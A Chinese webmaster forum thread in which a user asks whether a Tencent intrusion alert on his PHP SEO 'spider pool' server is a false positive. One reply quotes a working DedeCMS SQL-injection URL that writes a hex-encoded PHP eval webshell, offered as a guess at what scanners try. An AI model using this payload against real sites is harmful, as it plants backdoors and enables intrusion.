企鹅发了短信说被入侵.

sora · 发表于 2018-7-3 22:32:15

自己写的蜘蛛池程序, 纯php, 没有数据库.

外出刚回来看到短信马上ssh.

检查根本就没有这个文件. 继续查web文件, 也没有被修改.

amh4.2的面板, 所有端口都修改, 密码都是长随机字符.

正在webscan.360.cn上扫描, 第一次遇到, 想问问有没有mjj知道或者遇到这种情况, 是不是误报了.

ber · 发表于 2018-7-3 22:35:53

蜘蛛池好用不..

显示全部楼层 · 发表于 2018-7-3 22:37:00

提示: 作者被禁止或删除内容自动屏蔽

sora · 发表于 2018-7-3 22:38:06

ber 发表于 2018-7-3 22:35
蜘蛛池好用不..

额, 请关注下被入侵这个重点.
蜘蛛池其实都差不多, 原理就那样.

ber · 发表于 2018-7-3 22:45:59

sora 发表于 2018-7-3 22:38
额, 请关注下被入侵这个重点.
蜘蛛池其实都差不多, 原理就那样.

额我猜测是黑产大佬在批量扫描网站漏洞批量尝试exp导致的

比如织梦getshell,

http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION[123]=update `%23@__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123

复制代码

这样你缓存文件包含了url就会出现脚本木马啦.. 纯猜测哈

sora · 发表于 2018-7-3 22:50:13

ber 发表于 2018-7-3 22:45
额我猜测是黑产大佬在批量扫描网站漏洞批量尝试exp导致的

比如织梦getshell,

额, 没有缓存文件.
那个目录不是web文件目录, 图片里的tmp目录与web目录同级. 所以有点搞不懂.

ber · 发表于 2018-7-3 22:51:15

sora 发表于 2018-7-3 22:50
额, 没有缓存文件.
那个目录不是web文件目录, 图片里的tmp目录与web目录同级. 所以有点搞不懂. ...

tmp目录是干啥用的呀...

sora · 发表于 2018-7-3 22:56:14

ber 发表于 2018-7-3 22:51
tmp目录是干啥用的呀...

就两个文件.
mysql.sock
php_errors.log
不是网站文件目录. 所以很奇怪.

ber · 发表于 2018-7-3 22:59:19

sora 发表于 2018-7-3 22:56
就两个文件.
mysql.sock
php_errors.log

应该还是网站那边的问题喔是不是程序报错后会出现这种问题

苁林老鬼 · 发表于 2018-7-3 22:59:44

不能后台提交工单给他们？说下是误报看他们怎么弄呗

		自动登录	找回密码
密码			注册

优秀的苦瓜该用户已被删除	发表于 2018-7-3 22:37:00 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
优秀的苦瓜该用户已被删除
	回复支持反对举报

[Windows VPS] 企鹅发了短信说被入侵.

浏览过的版块